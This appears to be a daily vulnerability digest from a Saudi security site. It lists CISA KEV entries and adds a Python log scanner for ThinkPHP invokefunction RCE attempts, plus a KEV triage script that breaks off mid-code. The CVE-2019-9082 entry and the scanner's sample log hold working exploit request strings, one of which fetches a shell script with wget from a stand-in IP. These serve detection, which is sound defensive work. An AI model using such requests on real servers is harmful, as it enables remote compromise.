📧 info@ciso.sa | 📱 +966550939344 | Riyadh, Kingdom of Saudi Arabia
📅 Daily Security Digest — Thursday, April 16, 2026

🇸🇦 Saudi Cyber Daily Digest

All security vulnerabilities, threats, and news aggregated today from trusted sources — continuously updated

Thursday, April 16, 2026
156 CVEs
48 Threats
0 News
73 Critical
73 CISA KEV
🛡 Security Vulnerabilities (CVE)
156 vulnerabilities
Note on severity: every entry flagged ⚠ CISA KEV below is shown as CRITICAL / CVSS 9.0 regardless of its NVD score (CVE-2019-7481, read-only access, and CVE-2025-22226, an information disclosure, carry the same 9.0 as the remote code execution entries). Treat the KEV flag as the priority signal and confirm the score against NVD or the vendor advisory before ranking.
CVE-2026-34197
Apache ActiveMQ Code Injection via Improper Input Validation
05:03 KSA
CRITICAL CVSS 9.8 ⚠ CISA KEV
Apache ActiveMQ — CVE-2026-34197 Apache ActiveMQ contains an improper input validation vulnerability that allows for code injection. Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the pro…
CVE-2019-2616
Oracle BI Publisher Unauthorized Access Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Oracle BI Publisher Unauthorized Access Vulnerability — Oracle BI Publisher, formerly XML Publisher, contains an unspecified vulnerability that allows for various unauthorized actions. Open-source reporting attributes this vulnerability to allowing for authentication bypass.
CVE-2019-5825
Google Chromium V8 Out-of-Bounds Write Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Google Chromium V8 Out-of-Bounds Write Vulnerability — Google Chromium V8 Engine contains an out-of-bounds write vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that …
CVE-2019-6223
Apple iOS and macOS Group FaceTime Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple iOS and macOS Group Facetime Vulnerability — Apple iOS and macOS Group FaceTime contains an unspecified vulnerability where the call initiator can cause the recipient's Apple device to answer unknowingly or without user interaction.
CVE-2019-6340
Drupal Core Remote Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Drupal Core Remote Code Execution Vulnerability — In Drupal Core, some field types do not properly sanitize data from non-form sources. This can lead to arbitrary PHP code execution in some cases.
CVE-2019-6693
Fortinet FortiOS Use of Hard-Coded Credentials Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Fortinet FortiOS Use of Hard-Coded Credentials Vulnerability — Fortinet FortiOS contains a use of hard-coded credentials vulnerability that could allow an attacker to decrypt sensitive data in a FortiOS configuration backup file via knowledge of the hard-coded key.
CVE-2019-7192
QNAP Photo Station Improper Access Control Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
QNAP Photo Station Improper Access Control Vulnerability — QNAP NAS devices running Photo Station contain an improper access control vulnerability allowing remote attackers to gain unauthorized access to the system.
CVE-2019-7193
QNAP QTS Improper Input Validation Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
QNAP QTS Improper Input Validation Vulnerability — QNAP QTS contains an improper input validation vulnerability allowing remote attackers to inject code on the system.
CVE-2019-7194
QNAP Photo Station Path Traversal Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
QNAP Photo Station Path Traversal Vulnerability — QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
CVE-2019-7195
QNAP Photo Station Path Traversal Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
QNAP Photo Station Path Traversal Vulnerability — QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
CVE-2019-7238
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Sonatype Nexus Repository Manager Incorrect Access Control Vulnerability — Sonatype Nexus Repository Manager before 3.15.0 has an incorrect access control vulnerability. Exploitation allows for remote code execution.
CVE-2019-7256
Nice Linear eMerge E3-Series OS Command Injection Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Nice Linear eMerge E3-Series OS Command Injection Vulnerability — Nice Linear eMerge E3-Series contains an OS command injection vulnerability that allows an attacker to conduct remote code execution.
CVE-2019-7287
Apple iOS Memory Corruption Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple iOS Memory Corruption Vulnerability — Apple iOS contains a memory corruption vulnerability which could allow an attacker to perform remote code execution.
CVE-2019-7481
SonicWall SMA100 SQL Injection Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
SonicWall SMA100 SQL Injection Vulnerability — SonicWall SMA100 contains a SQL injection vulnerability allowing an unauthenticated user to gain read-only access to unauthorized resources.
CVE-2019-7483
SonicWall SMA100 Directory Traversal Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
SonicWall SMA100 Directory Traversal Vulnerability — In SonicWall SMA100, an unauthenticated Directory Traversal vulnerability in the handleWAFRedirect CGI allows the user to test for the presence of a file on the server.
CVE-2019-7609
Kibana Arbitrary Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Kibana Arbitrary Code Execution Vulnerability — Kibana contains an arbitrary code execution flaw in the Timelion visualizer.
CVE-2019-8394
Zoho ManageEngine ServiceDesk Plus (SDP) File Upload Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Zoho ManageEngine ServiceDesk Plus (SDP) File Upload Vulnerability — Zoho ManageEngine ServiceDesk Plus (SDP) contains an unspecified vulnerability that allows remote users to upload files via login page customization.
CVE-2019-8506
Apple Multiple Products Type Confusion Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple Multiple Products Type Confusion Vulnerability — A type confusion issue affecting multiple Apple products allows processing of maliciously crafted web content, leading to arbitrary code execution.
CVE-2019-8526
Apple macOS Use-After-Free Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple macOS Use-After-Free Vulnerability — Apple macOS contains a use-after-free vulnerability that could allow for privilege escalation.
CVE-2019-8605
Apple Multiple Products Use-After-Free Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple Multiple Products Use-After-Free Vulnerability — A use-after-free vulnerability in Apple iOS, macOS, tvOS, and watchOS could allow a malicious application to execute code with system privileges.
CVE-2019-8720
WebKitGTK Memory Corruption Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
WebKitGTK Memory Corruption Vulnerability — WebKitGTK contains a memory corruption vulnerability which can allow an attacker to perform remote code execution.
CVE-2019-9082
ThinkPHP Remote Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
ThinkPHP Remote Code Execution Vulnerability — ThinkPHP contains an unspecified vulnerability that allows for remote code execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
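As an added detection example (not code from the digest or from ThinkPHP): the request pattern quoted in the CVE-2019-9082 entry above travels in the query string, so it is visible in ordinary web server access logs and a short Python scanner can flag attempts once URL encoding is undone. The log lines, IP addresses and the `wget` argument are constructed for the example. The matcher assumes the route form shown in the entry, `\think\<class>/invokefunction`, and it will not see the same payload sent in a POST body, which a combined-format access log does not record.

```python
r"""Detect ThinkPHP invokefunction RCE attempts in combined-format access logs.

Added example; not code from ciso.sa or from the ThinkPHP project. The
sample log lines below are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# After decoding, the abused route contains a literal backslash class path
# ending in /invokefunction, as quoted in the CVE-2019-9082 entry.
INVOKE_RE = re.compile(r"\\think\\[a-z]+/invokefunction", re.IGNORECASE)

# Constructed sample: two exploitation attempts (one plain, one URL-encoded),
# one benign ThinkPHP route, one POST whose body is not logged.
SAMPLE_LOG = r"""
203.0.113.5 - - [16/Apr/2026:05:12:01 +0300] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.5 - - [16/Apr/2026:05:12:03 +0300] "GET /public/?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=wget+http%3A%2F%2F198.51.100.7%2Fx.sh HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.20 - - [16/Apr/2026:05:13:10 +0300] "GET /index.php?s=/index/article/show&id=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Apr/2026:05:14:22 +0300] "POST /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def decode_target(target: str) -> str:
    """URL-decode up to twice; double encoding is a common filter-evasion trick."""
    for _ in range(2):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def detect(line: str) -> dict | None:
    """Return an alert record for an invokefunction attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    if not INVOKE_RE.search(decode_target(rec["target"])):
        return None
    # Pull out what was invoked; parse_qs decodes names and values once.
    qs = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)

    def first(key: str) -> str:
        return qs.get(key, [""])[0]

    return {
        "ip": rec["ip"], "ts": rec["ts"], "method": rec["method"], "status": rec["status"],
        "route": first("s"), "function": first("function"),
        "callee": first("vars[0]"), "argument": first("vars[1][]"),
    }


def scan(log_text: str) -> list[dict]:
    """Scan a whole log; returns one record per matching request line."""
    return [a for a in (detect(line) for line in log_text.splitlines()) if a]


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} {a['status']} "
              f"{a['function']}({a['callee']!r}, {a['argument']!r})")
```

A status of 200 on a matching line is worth more than the match itself: the handler accepted the route, so the host should be treated as compromised until the response body or process history says otherwise.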
CVE-2019-9621
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery (SSRF) Vulnerability — Synacor Zimbra Collaboration Suite (ZCS) contains a server-side request forgery (SSRF) vulnerability via the ProxyServlet component.
CVE-2019-9670
Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Synacor Zimbra Collaboration Suite (ZCS) Improper Restriction of XML External Entity Reference — Synacor Zimbra Collaboration Suite (ZCS) contains an improper restriction of XML external entity (XXE) vulnerability in the mailboxd component.
CVE-2023-38831
RARLAB WinRAR Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
RARLAB WinRAR Code Execution Vulnerability — RARLAB WinRAR contains an unspecified vulnerability that allows an attacker to execute code when a user attempts to view a benign file within a ZIP archive.
CVE-2023-40044
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Progress WS_FTP Server Deserialization of Untrusted Data Vulnerability — Progress WS_FTP Server contains a deserialization of untrusted data vulnerability in the Ad Hoc Transfer module that allows an authenticated attacker to execute remote commands on the underlying operating sy…
CVE-2023-41061
Apple iOS, iPadOS, and watchOS Wallet Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple iOS, iPadOS, and watchOS Wallet Code Execution Vulnerability — Apple iOS, iPadOS, and watchOS contain an unspecified vulnerability due to a validation issue affecting Wallet in which a maliciously crafted attachment may result in code execution. This vulnerability was chain…
CVE-2023-41064
Apple iOS, iPadOS, and macOS ImageIO Buffer Overflow Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple iOS, iPadOS, and macOS ImageIO Buffer Overflow Vulnerability — Apple iOS, iPadOS, and macOS contain a buffer overflow vulnerability in ImageIO when processing a maliciously crafted image, which may lead to code execution. This vulnerability was chained with CVE-2023-41061.
CVE-2023-41179
Trend Micro Apex One and Worry-Free Business Security Remote Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Trend Micro Apex One and Worry-Free Business Security Remote Code Execution Vulnerability — Trend Micro Apex One and Worry-Free Business Security contain an unspecified vulnerability in the third-party anti-virus uninstaller that could allow an attacker to manipulate the module t…
CVE-2023-41990
Apple Multiple Products Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple Multiple Products Code Execution Vulnerability — Apple iOS, iPadOS, macOS, tvOS, and watchOS contain an unspecified vulnerability that allows for code execution when processing a font file.
CVE-2023-41991
Apple Multiple Products Improper Certificate Validation Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple Multiple Products Improper Certificate Validation Vulnerability — Apple iOS, iPadOS, macOS, and watchOS contain an improper certificate validation vulnerability that can allow a malicious app to bypass signature validation.
CVE-2025-1976
Broadcom Brocade Fabric OS Code Injection Vulnerability (Local, Admin to Root)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Broadcom Brocade Fabric OS Code Injection Vulnerability — Broadcom Brocade Fabric OS contains a code injection vulnerability that allows a local user with administrative privileges to execute arbitrary code with full root privileges.
CVE-2025-20281
Cisco ISE API Injection Vulnerability Enables Remote Code Execution
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Cisco Identity Services Engine Injection Vulnerability — Cisco Identity Services Engine contains an injection vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC due to insufficient validation of user-supplied input allowing an attacker to exploit this vulnerability by…
CVE-2025-20333
Cisco Secure Firewall ASA/FTD VPN Web Server Buffer Overflow RCE
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Cisco Secure Firewall Adaptive Security Appliance (ASA) and Secure Firewall Threat Defense (FTD) Buffer Overflow Vulnerability — Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Software VPN Web Server contain a buffer overflow vuln…
CVE-2025-20337
Cisco ISE API Injection Vulnerability Allows Remote Code Execution
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Cisco Identity Services Engine Injection Vulnerability — Cisco Identity Services Engine contains an injection vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC due to insufficient validation of user-supplied input allowing an attacker to exploit this vulnerability by…
CVE-2025-20352
Cisco IOS/IOS XE SNMP Stack Buffer Overflow RCE
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Cisco IOS and IOS XE Software SNMP Denial of Service and Remote Code Execution Vulnerability — Cisco IOS and IOS XE contain a stack-based buffer overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow for denial of service or remote cod…
CVE-2025-20362
Cisco Secure Firewall ASA/FTD VPN Missing Authorization Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Missing Authorization Vulnerability — Cisco Secure Firewall Adaptive Security (ASA) Appliance and Secure Firewall Threat Defense (FTD) Software VPN Web Server contain a missing author…
CVE-2025-20393
Cisco Email Security Products Remote Code Execution via Input Validation
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Cisco Multiple Products Improper Input Validation Vulnerability — Cisco Secure Email Gateway, Secure Email, AsyncOS Software, and Web Manager appliances contain an improper input validation vulnerability that allows threat actors to execute arbitrary commands with root privilege…
CVE-2025-21042
Samsung Mobile Out-of-Bounds Write in libimagecodec.quram.so
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Samsung Mobile Devices Out-of-Bounds Write Vulnerability — Samsung mobile devices contain an out-of-bounds write vulnerability in libimagecodec.quram.so. This vulnerability could allow remote attackers to execute arbitrary code.
CVE-2025-21479
Qualcomm Chipsets GPU Micronode Unauthorized Command Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability — Multiple Qualcomm chipsets contain an incorrect authorization vulnerability. This vulnerability allows for memory corruption due to unauthorized command execution in GPU micronode while executing specific sequence…
CVE-2025-21480
Qualcomm Chipsets GPU Unauthorized Command Execution Memory Corruption
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability — Multiple Qualcomm chipsets contain an incorrect authorization vulnerability. This vulnerability allows for memory corruption due to unauthorized command execution in GPU micronode while executing specific sequence…
CVE-2025-21590
Juniper Junos OS Code Injection via Improper Compartmentalization
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Juniper Junos OS Improper Isolation or Compartmentalization Vulnerability — Juniper Junos OS contains an improper isolation or compartmentalization vulnerability. This vulnerability could allow a local attacker with high privileges to inject arbitrary code.
CVE-2025-22224
VMware ESXi/Workstation TOCTOU Race Condition Code Execution
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
VMware ESXi and Workstation TOCTOU Race Condition Vulnerability — VMware ESXi and Workstation contain a time-of-check time-of-use (TOCTOU) race condition vulnerability that leads to an out-of-bounds write. Successful exploitation enables an attacker with local administrative priv…
CVE-2025-22225
VMware ESXi Arbitrary Kernel Write Vulnerability - Sandbox Escape
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
VMware ESXi Arbitrary Write Vulnerability — VMware ESXi contains an arbitrary write vulnerability. Successful exploitation allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.
CVE-2025-22226
VMware HGFS Out-of-Bounds Read Information Disclosure (CVE-2025-22226)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability — VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability due to an out-of-bounds read in HGFS. Successful exploitation allows an attacker with administrative privileges to a vi…
CVE-2025-4008
Smartbedded Meteobridge Remote Command Injection (CVE-2025-4008)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Smartbedded Meteobridge Command Injection Vulnerability — Smartbedded Meteobridge contains a command injection vulnerability that could allow remote unauthenticated attackers to gain arbitrary command execution with elevated privileges (root) on affected devices.
CVE-2025-40551
SolarWinds Web Help Desk Unauthenticated Remote Code Execution via Deserialization
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability — SolarWinds Web Help Desk contains a deserialization of untrusted data vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could b…
CVE-2025-40602
SonicWall SMA1000 Missing Authorization Privilege Escalation in AMC
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
SonicWall SMA1000 Missing Authorization Vulnerability — SonicWall SMA1000 contains a missing authorization vulnerability that could allow for privilege escalation in the appliance management console (AMC) of affected devices.
CVE-2025-41244
VMware Aria Operations and Tools Privilege Escalation via Unsafe Actions
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Broadcom VMware Aria Operations and VMware Tools Privilege Defined with Unsafe Actions Vulnerability — Broadcom VMware Aria Operations and VMware Tools contain a privilege defined with unsafe actions vulnerability. A malicious local actor with non-administrative privileges having…
CVE-2025-42599
Qualitia Active! Mail Stack-Based Buffer Overflow RCE/DoS
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability — Qualitia Active! Mail contains a stack-based buffer overflow vulnerability that allows a remote, unauthenticated attacker to execute arbitrary code or trigger a denial of service via a specially crafted request.
CVE-2025-42999
SAP NetWeaver Visual Composer Deserialization RCE Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
SAP NetWeaver Deserialization Vulnerability — SAP NetWeaver Visual Composer Metadata Uploader contains a deserialization vulnerability that allows a privileged attacker to compromise the confidentiality, integrity, and availability of the host system by deserializing untrusted or…
CVE-2025-43200
Apple iOS/iPadOS/macOS/watchOS/visionOS iCloud Link Media Processing Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple Multiple Products Unspecified Vulnerability — Apple iOS, iPadOS, macOS, watchOS, and visionOS, contain an unspecified vulnerability when processing a maliciously crafted photo or video shared via an iCloud Link.
CVE-2025-43300
Apple iOS/iPadOS/macOS Image I/O Out-of-Bounds Write RCE
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple iOS, iPadOS, and macOS Out-of-Bounds Write Vulnerability — Apple iOS, iPadOS, and macOS contain an out-of-bounds write vulnerability in the Image I/O framework.
CVE-2025-43529
Apple WebKit Use-After-Free Vulnerability in Multiple Products
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Apple Multiple Products Use-After-Free WebKit Vulnerability — Apple iOS, iPadOS, macOS, and other Apple products contain a use-after-free vulnerability in WebKit. Processing maliciously crafted web content may lead to memory corruption. This vulnerability could impact HTML parser…
CVE-2025-4427
Ivanti EPMM API Authentication Bypass Vulnerability (CVE-2025-4427)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Ivanti Endpoint Manager Mobile (EPMM) Authentication Bypass Vulnerability — Ivanti Endpoint Manager Mobile (EPMM) contains an authentication bypass vulnerability in the API component that allows an attacker to access protected resources without proper credentials via crafted API …
CVE-2025-4428
Ivanti EPMM API Code Injection Vulnerability (CVE-2025-4428)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Ivanti Endpoint Manager Mobile (EPMM) Code Injection Vulnerability — Ivanti Endpoint Manager Mobile (EPMM) contains a code injection vulnerability in the API component that allows an authenticated attacker to remotely execute arbitrary code via crafted API requests. This vulnerab…
CVE-2025-53690
Sitecore Deserialization RCE via Default Machine Keys
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Sitecore Multiple Products Deserialization of Untrusted Data Vulnerability — Sitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud contain a deserialization of untrusted data vulnerability involving the use of default machine keys…
CVE-2025-53770
Microsoft SharePoint Deserialization RCE Vulnerability - CVE-2025-53770
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Microsoft SharePoint Deserialization of Untrusted Data Vulnerability — Microsoft SharePoint Server on-premises contains a deserialization of untrusted data vulnerability that could allow an unauthorized attacker to execute code over a network. This vulnerability could be chained …
CVE-2025-5777
Citrix NetScaler ADC/Gateway Out-of-Bounds Read Vulnerability (CVE-2025-5777)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Citrix NetScaler ADC and Gateway Out-of-Bounds Read Vulnerability — Citrix NetScaler ADC and Gateway contain an out-of-bounds read vulnerability due to insufficient input validation. This vulnerability can lead to memory overread when the NetScaler is configured as a Gateway (VPN…
CVE-2025-57819
Sangoma FreePBX Authentication Bypass Leading to RCE
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Sangoma FreePBX Authentication Bypass Vulnerability — Sangoma FreePBX contains an authentication bypass vulnerability, due to insufficiently sanitized user-supplied data, that allows unauthenticated access to FreePBX Administrator leading to arbitrary database manipulation and remote co…
CVE-2025-58034
Fortinet FortiWeb OS Command Injection Vulnerability (CVE-2025-58034)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Fortinet FortiWeb OS Command Injection Vulnerability — Fortinet FortiWeb contains an OS command Injection vulnerability that may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands.
CVE-2025-6204
DELMIA Apriso Code Injection Vulnerability Allows Arbitrary Code Execution
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Dassault Systèmes DELMIA Apriso Code Injection Vulnerability — Dassault Systèmes DELMIA Apriso contains a code injection vulnerability that could allow an attacker to execute arbitrary code.
CVE-2025-6205
DELMIA Apriso Missing Authorization Vulnerability (CVE-2025-6205)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Dassault Systèmes DELMIA Apriso Missing Authorization Vulnerability — Dassault Systèmes DELMIA Apriso contains a missing authorization vulnerability that could allow an attacker to gain privileged access to the application.
CVE-2025-6218
WinRAR Path Traversal Remote Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
RARLAB WinRAR Path Traversal Vulnerability — RARLAB WinRAR contains a path traversal vulnerability allowing an attacker to execute code in the context of the current user.
CVE-2025-62215
Microsoft Windows Kernel Race Condition Privilege Escalation Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Microsoft Windows Race Condition Vulnerability — Microsoft Windows Kernel contains a race condition vulnerability that allows a local attacker with low-level privileges to escalate privileges. Successful exploitation of this vulnerability could enable the attacker to gain SYSTEM-…
CVE-2025-62221
Windows Cloud Files Mini Filter Driver Use-After-Free Privilege Escalation
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Microsoft Windows Use After Free Vulnerability — Microsoft Windows Cloud Files Mini Filter Driver contains a use after free vulnerability that can allow an authorized attacker to elevate privileges locally.
CVE-2025-64328
Sangoma FreePBX OS Command Injection in Endpoint Manager
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Sangoma FreePBX OS Command Injection Vulnerability — Sangoma FreePBX Endpoint Manager contains an OS command injection vulnerability that could allow for a post-authentication command injection by an authenticated known user via the testconnection -> check_ssh_connect() function.…
CVE-2025-6543
Citrix NetScaler ADC/Gateway Buffer Overflow - DoS and Control Flow
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Citrix NetScaler ADC and Gateway Buffer Overflow Vulnerability — Citrix NetScaler ADC and Gateway contain a buffer overflow vulnerability leading to unintended control flow and Denial of Service. NetScaler must be configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Pr…
CVE-2025-6554
Google Chromium V8 Type Confusion Remote Code Execution Vulnerability
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Google Chromium V8 Type Confusion Vulnerability — Google Chromium V8 contains a type confusion vulnerability that could allow a remote attacker to perform arbitrary read/write via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, in…
CVE-2025-6558
Chromium ANGLE GPU Sandbox Escape via Improper Input Validation
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Google Chromium ANGLE and GPU Improper Input Validation Vulnerability — Google Chromium contains an improper input validation vulnerability in ANGLE and GPU. This vulnerability could allow a remote attacker to potentially perform a sandbox escape via a crafted HTML page. This vul…
CVE-2025-66644
Array Networks ArrayOS AG OS Command Injection Vulnerability (CVE-2025-66644)
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
Array Networks ArrayOS AG OS Command Injection Vulnerability — Array Networks ArrayOS AG contains an OS command injection vulnerability that could allow an attacker to execute arbitrary commands.
CVE-2025-8088
RARLAB WinRAR Path Traversal Vulnerability Enables Arbitrary Code Execution
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
RARLAB WinRAR Path Traversal Vulnerability — RARLAB WinRAR contains a path traversal vulnerability affecting the Windows version of WinRAR. This vulnerability could allow an attacker to execute arbitrary code by crafting malicious archive files.
CVE-2025-8875
N-able N-Central Insecure Deserialization Remote Code Execution
11:01 KSA
CRITICAL CVSS 9.0 ⚠ CISA KEV
N-able N-Central Insecure Deserialization Vulnerability — N-able N-Central contains an insecure deserialization vulnerability that could lead to command execution.
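The entries flagged ⚠ CISA KEV above all carry the same Required Action wording shown in the CVE-2026-34197 entry (apply vendor mitigations or discontinue use, per BOD 22-01), and BOD 22-01 attaches a due date to each. What a practitioner wants from such a list is the intersection with their own inventory, ordered by that due date. The following added example (not code from the digest or from CISA) does that triage. It uses the field names of CISA's public KEV JSON feed (`vulnerabilities[].cveID`, `vendorProject`, `product`, `dateAdded`, `dueDate`, `requiredAction`, `knownRansomwareCampaignUse`); the feed excerpt, the inventory, and the dates and ransomware flags attached to the sample entries are constructed placeholders, not the feed's real values.

```python
"""Triage CISA KEV entries against a local asset inventory.

Added example; not code from ciso.sa or CISA. The KEV excerpt below only
borrows the feed's field names. The CVE IDs come from the digest, but their
dateAdded/dueDate/knownRansomwareCampaignUse values are placeholders, and
the inventory is constructed.
"""
from __future__ import annotations

import json
import urllib.request
from datetime import date

KEV_FEED_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed excerpt in the shape of the KEV feed (placeholder dates/flags).
SAMPLE_KEV = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2026-34197", "vendorProject": "Apache", "product": "ActiveMQ",
     "dateAdded": "2026-04-15", "dueDate": "2026-05-06",
     "knownRansomwareCampaignUse": "Unknown",
     "requiredAction": "Apply mitigations per vendor instructions."},
    {"cveID": "CVE-2025-53770", "vendorProject": "Microsoft", "product": "SharePoint",
     "dateAdded": "2026-04-01", "dueDate": "2026-04-08",
     "knownRansomwareCampaignUse": "Known",
     "requiredAction": "Apply mitigations per vendor instructions."},
    {"cveID": "CVE-2019-7609", "vendorProject": "Elastic", "product": "Kibana",
     "dateAdded": "2026-04-10", "dueDate": "2026-05-01",
     "knownRansomwareCampaignUse": "Unknown",
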